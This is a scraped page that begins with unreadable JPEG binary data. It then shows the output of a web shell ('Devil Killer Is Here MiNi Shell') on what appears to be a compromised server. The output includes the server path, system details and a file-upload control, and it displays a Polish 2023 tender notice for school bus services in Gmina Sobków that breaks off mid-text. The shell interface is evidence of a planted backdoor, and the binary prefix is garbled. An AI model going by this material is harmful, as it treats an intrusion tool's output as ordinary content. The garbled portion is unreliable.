JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230629/0028198301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Dowóz dzieci i młodzieży do szkół na terenie Gminy Sobków w roku szkolnym 2023/2024 na podstawie zakupu miesięcznych ulgowych biletów z ustawową ulgą przysługującą młodzieży szkolnej” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Obsługi Ekonomiczno-Administracyjnej Oświaty w Sobkowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 290627211</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ŹRÓDŁOWA, 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sobków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-305</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">41 3871 025</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zoeao@op.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zoeao-sobkow.biuletyn.net/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dowóz dzieci i młodzieży do szkół na terenie Gminy Sobków w roku szkolnym 2023/2024 na podstawie zakupu miesięcznych ulgowych biletów z ustawową ulgą przysługującą młodzieży szkolnej” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6efdbfcb-0e75-11ee-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00281983</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00041678/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usługi dowozu uczniów do placówek oświatowych w roku szkolnym 2023/2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6efdbfcb-0e75-11ee-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z zapisami SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">ZGODNIE Z ZAPISAMI SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZO.261.4.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia stanowi świadczenie usługi dowozu dzieci i młodzieży do szkół i placówek oświatowych na terenie Gminy Sobków w roku szkolnym 2023/2024 na utworzonych przez Wykonawcę liniach regularnych, z pierwszeństwem przejazdu dzieci i młodzieży z biletem miesięcznym, w cenach biletów ustalonych w niniejszym postępowaniu.<br/>2.	Przedmiot zamówienia obejmuje 4 TRASY (trasa: dom – szkoła – dom):<br/>	I TRASA - Dowóz uczniów i opiekuna do Szkoły Podstawowej im Jana Pawła II w Sobkowie w roku szkolnym 2023/2024<br/> II TRASA - Dowóz uczniów i opiekuna do Zespołu Placówek Oświatowych w Mokrsku Dolnym i do Szkoły Podstawowej im Jana Pawła II w Sobkowie i w roku szkolnym 2023/2024, <br/>	III TRASA - Dowóz uczniów i opiekuna do Zespołu Placówek Oświatowych w Brzegach i do Szkoły Podstawowej im Jana Pawła II w Sobkowie i w roku szkolnym 2023/2024 <br/>	IV TRASA - Dowóz uczniów i opiekuna do Szkoły Podstawowej w Chomentowie, do Szkoły Podstawowej w Lipie i do Zespołu Placówek Oświatowych w Korytnicy w roku szkolnym 2023/2024<br/>3.	Przedmiot zamówienia zawiera bezpłatny przewóz 4 opiekunów, których Wykonawca zobowiązany jest zabrać z terenu gminy Sobków na danej trasie, w miejscu umówionym z Zamawiającym, tj: <br/>	Na trasie I dowóz uczniów do Szkoły Podstawowej Jana Pawła II w Sobkowie - odbiór opiekuna rozpocznie się i zakończy na przystanku przy szkole w Sobkowie<br/>	Na trasie II dowóz uczniów do Zespołu Placówek Oświatowych w Mokrsku Dolnym i do Szkoły Podstawowej im Jana Pawła II w Sobkowie odbiór opiekuna rozpocznie się i zakończy na przystanku przy szkole w Mokrsku Dolnym.<br/>	Na trasie III dowóz uczniów do Zespołu Placówek Oświatowych w Brzegach i do Szkoły Podstawowej im Jana Pawła II w Sobkowie odbiór opiekuna rozpocznie się i zakończy na przystanku przy szkole w Sobkowie<br/>	Na trasie IV dowóz uczniów do Zespołu Placówek Oświatowych w Brzegach i do Szkoły Podstawowej im Jana Pawła II w Sobkowie odbiór opiekuna rozpocznie się i zakończy na przystanku przy szkole w Sobkowie<br/>	Na trasie IV dowóz uczniów i opiekuna do Szkoły Podstawowej w Chomentowie, do Szkoły Podstawowej w Lipie i do Zespołu Placówek Oświatowych w Korytnicy odbiór opiekuna rozpocznie się i zakończy na przystanku przy szkole w Chomentowie.<br/> Wykonawca zobowiązany będzie zawsze w pierwszej kolejności zabierać opiekuna i rozpocząć dowóz uczniów z ustalonych dla danej trasy przystanków .<br/>4.	Oznaczenie przedmiotu zamówienia we Wspólnym Słowniku Zamówień (CPV): <br/>1)	Główny kod:<br/>	60000000-8 – Usługi transportowe (z wyłączeniem transportu odpadów),<br/>2)	Dodatkowe kody:<br/>	60100000-9 – Usługi w zakresie transportu drogowego,<br/>	60112000-6 – Usługi w zakresie publicznego transportu drogowego.<br/>5.	Przedmiot zamówienia polega na zapewnieniu transportu związanego z realizacją usługi dowozu dzieci i uczniów do szkół i placówek oświatowych z terenu Gminy Sobków. Przewóz obejmuje trasę: dom – szkoła – dom, zgodnie z ustawą z dnia 14 grudnia 2016 r. – Prawo oświatowe (Dz.U. z 2023 r. poz. 900). <br/>6.	Przedmiot zamówienia będzie realizowany poprzez zakup imiennych, ulgowych biletów miesięcznych, szkolnych na podstawie art. 5a. ustawy z dnia 20 czerwca 1992 r. o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego (Dz.U. z 2018 r. poz. 295) <br/>7.	Zamówienie na bilety będzie złożone w terminie najpóźniej do 25 dnia miesiąca poprzedzającego<br/>miesiąc, na który bilety mają być wystawione. Wykonawca jest zobowiązany do dostarczenia<br/>zamówionych biletów w terminie do ostatniego dnia miesiąca poprzedzającego miesiąc<br/>wykonania usługi. <br/>8.	Przewozy będą realizowane w dni robocze w ciągu roku szkolnego 2023/2024 z wyłączeniem wakacji, ferii, przerw świątecznych, dni wolnych od zajęć oraz dni, w których zajęcia nie będą odbywały się z powodu okoliczności związanych z wystąpieniem epidemii, w tym m.in. wirusa SARS-CoV-2 lub choroby wywołanej tym wirusem (COVID-19) oraz w przypadku wprowadzenia zdalnego nauczania, lub innych okoliczności niezależnych od Zamawiającego. <br/>9.	W przypadku odpracowywania zajęć szkolnych w innym dniu, wolnym od zajęć, Wykonawca zobowiązany będzie zapewnić przewóz uczniom i dzieciom zgodnie z harmonogramem ustalonym z dyrektorami szkół, w terminie co najmniej 3 dni przed planowaną usługą.<br/>10.	Niniejszym postępowaniem objęty jest transport dzieci i opiekunów do następujących placówek na terenie Gminy Sobków:<br/>1) Szkoła Podstawowa im. Jana Pawła II w Sobkowie, ul. Źródłowa 4, 28-305 Sobków<br/>2)	Zespół Placówek Oświatowych w Mokrsku Dolnym, Mokrsko Dolne 50a, 28-305 Sobków i Szkoła Podstawowa im. Jana Pawła II w Sobkowie.<br/>3)	Zespół Placówek Oświatowych w Brzegach, Brzegi 104, 28-305 Sobków i Szkoła Podstawowej im. Jana Pawła II w Sobkowie<br/>4)	Szkoła Podstawowa w Chomentowie, Chomentów 72, 28-305 Sobków, Szkoła Podstawowej w Lipie, Lipa 6a, 28-305 Sobków i Zespół Placówek Oświatowych w Korytnicy, Korytnica 206, 28-305 Sobków.<br/>11.	Zamawiający oświadcza, że w roku szkolnym 2023/2024 transport uczniów do szkół obejmuje 240 uczniów i 4 opiekunów. <br/>12.	Prognozowane zapotrzebowanie na bilety: <br/>a)	bilet ulgowy dla dzieci i młodzieży, w okresie od rozpoczęcia odbywania obowiązkowego<br/>rocznego przygotowania przedszkolnego do ukończenia szkoły podstawowej łącznie na I, II, III, IV TRASIE - 204 szt.<br/>b)	bilet normalny dla dzieci 4,5 latki łącznie na I, II, III, IV TRASIE - 36 szt.<br/>13.	Zamawiający zastrzega sobie możliwość zmiany liczby dowożonych uczniów.<br/>14.	Z tytułu zmniejszenia ilości dowożonych uczniów Zamawiający nie przewiduje ponoszenia<br/>dodatkowych opłat, a Wykonawca nie będzie rościł pretensji, ani żądał rekompensaty finansowej<br/>jeżeli wartość zamówienia będzie mniejsza niż szacowana przez Zamawiającego<br/>15.	Transport uczniów powinien odbywać się pod opieką osób dorosłych, których obecność w pojazdach zapewni Zamawiający.<br/>16.	W razie awarii pojazdu Wykonawca zapewni zastępczy autobus w czasie maksymalnie 60 minut od momentu zgłoszenia awarii.<br/>17.	Trasy codziennego dowożenia dzieci i uczniów do szkół obejmują łącznie ok. 135,80 km dziennie. Zamawiający przewiduje, że w okresie objętym niniejszym zamówieniem (rok szkolny 2023/2024 = 187 dni) pojazdy pokonają łącznie ok. 25 394,60 km.<br/>18.	Transport powinien być zorganizowany z zachowaniem przepisów prawa oraz zasad bezpieczeństwa, a w szczególności zgodnie z przepisami ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. z 2022 r. poz. 2201).<br/>19.	Wykonawca zobowiązany jest do codziennego kontrolowania trzeźwości kierowców prowadzących pojazdy, które przewożą dzieci i uczniów.<br/>20.	Transport powinien być świadczony z wykorzystaniem 4 pojazdów.<br/>21.	Wykonawca oświadcza, iż pojazdy użyte do realizacji umowy posiadają aktualne ubezpieczenie OC oraz aktualne badania techniczne dopuszczające pojazdy do ruchu oraz gwarantuje, iż będą je posiadać przez cały okres obowiązywania niniejszej umowy.<br/>22.	W okresie zimowym pojazdy dowożące dzieci muszą być ogrzewane, na stopniach wejściowych do pojazdów nie może zalegać śnieg, ani lód. W okresie zimowym Wykonawca musi zwrócić szczególną uwagę, aby zapewnić bezpieczeństwo podczas wsiadania i wysiadania. Przez cały rok w pojazdach musi być utrzymywana czystość. <br/>23.	Wykonawca zobowiązany jest realizować zamówienie z wykorzystaniem zgłoszonych w ofercie pojazdów. Na etapie realizacji umowy każdy ze zgłoszonych pojazdów może zostać zastąpiony innym, o nie niższych parametrach (np. pojazd zgłoszony w ofercie z rocznika 2013 musi zostać zastąpiony pojazdem z rocznika 2013 lub młodszym).<br/>24.	Zamawiający dopuści zmianę zaoferowanego środka transportu w trakcie realizacji umowy na pisemny umotywowany wniosek Wykonawcy. Zmiana pojazd na pojazd o mniejszej ilości miejsc siedzących może mieć miejsce w przypadku mniejszej ilości uczniów na trasach dowożenia dzieci. Pojazd zaoferowany jako zamienny nie może być starszy od pojazdu zamienianego oraz musi posiadać ważną polisę OC, a także ważne badania techniczne. Zmiana środka transportu nie powoduje zmiany wysokości wynagrodzenia Wykonawcy. Zmiana środka transportu będzie każdorazowo zależna od decyzji Zamawiającego.<br/>25.	Zamawiający zastrzega możliwość odwołania poszczególnych kursów lub całkowitego odwołania dowozów w konkretne dni, wynikając e ze szczególnych lub nieprzewidzianych okoliczności.<br/>26.	Wszystkie wymagania określone w dokumentach wskazanych w SWZ stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 p.z.p. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60100000-9 - Usługi w zakresie transportu drogowego</p> <p class="mb-0">60112000-6 - Usługi w zakresie publicznego transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-04 do 2024-06-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	W celu obliczenia ceny oferty, wykonawca wypełnia formularz ofertowy, stanowiący załącznik nr 2 do SWZ.<br/>2.	Cena ofertowa brutto musi uwzględniać wszystkie koszty związane z realizacją przedmiotu zamówienia zgodnie z opisem przedmiotu zamówienia, określonym w niniejszej SWZ. Stawka<br/>podatku VAT w przedmiotowym postępowaniu wynosi 8%.<br/>3.	Cena podana na Formularzu Ofertowym jest ceną ostateczną, niepodlegającą negocjacji i wyczerpującą wszelkie należności Wykonawcy wobec Zamawiającego związane z realizacją<br/>przedmiotu zamówienia. Uważa się, że wykonawca wziął pod uwagę wszystkie wymagania i zobowiązania zawarte we wszystkich częściach niniejszej SWZ.<br/>4.	Cena oferty powinna być wyrażona w złotych polskich (PLN) z dokładnością do dwóch miejsc po przecinku.<br/>5.	Zamawiający nie przewiduje rozliczeń w walucie obcej.<br/>6.	Wyliczona cena oferty brutto będzie służyć do porównania złożonych ofert i do rozliczenia w trakcie realizacji zamówienia.<br/>7. Zamawiający nie przewiduje rozliczeń w walucie obcej.<br/>8.	Wykonawcy ponoszą wszelkie koszty związane z przygotowaniem i złożeniem oferty.<br/>9.	Cena może być tylko jedna za oferowany przedmiot zamówienia, nie dopuszcza się wariantowości cen.<br/>10.	Zgodnie z art. 225 p.z.p. jeżeli została złożona oferta, której wybór prowadziłby do powstania u zamawiającego obowiązku podatkowego zgodnie z ustawą z 11 marca 2004 r. o podatku od towarów i usług, dla celów zastosowania kryterium ceny lub kosztu zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. W takiej sytuacji wykonawca ma obowiązek:<br/>1)	poinformowania zamawiającego, że wybór jego oferty będzie prowadził do powstania u zamawiającego obowiązku podatkowego;<br/>2)	wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>3)	wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym zamawiającego, bez kwoty podatku;<br/>4)	wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą wykonawcy, będzie miała zastosowanie.<br/>Informację w powyższym zakresie wykonawca składa w załączniku nr 2 do SWZ – Informacja o wykonawcy. Brak złożenia ww. informacji będzie postrzegany jako brak powstania obowiązku podatkowego u zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rok produkcji pojazdów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 p.z.p., zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1.	Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający wymaga, aby Wykonawca posiadał ważną licencję (zezwolenie) do wykonywania na terenie Polski transportu drogowego osób, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym oraz z ustawą z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym (Dz.U. z 2023 poz.1047).<br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>3.	Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje warunku w tym zakresie.<br/>4.	Zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego wykonawcy lub osób skierowanych przez wykonawcę do realizacji zamówienia, umożliwiające realizację zamówienia na odpowiednim poziomie jakości jeżeli:<br/>1.	Warunek w zakresie doświadczenia:<br/>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie w sposób należyty wykonał lub wykonuje co najmniej 1 usługę polegającą na transporcie uczniów do szkół podstawowych trwającą<br/>minimum 6 miesięcy, o łącznej wartości nie mniejszej niż 30 000,00 zł brutto, oraz z załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub<br/>ciągłych nadal wykonywanych referencje bądź inne dokumenty 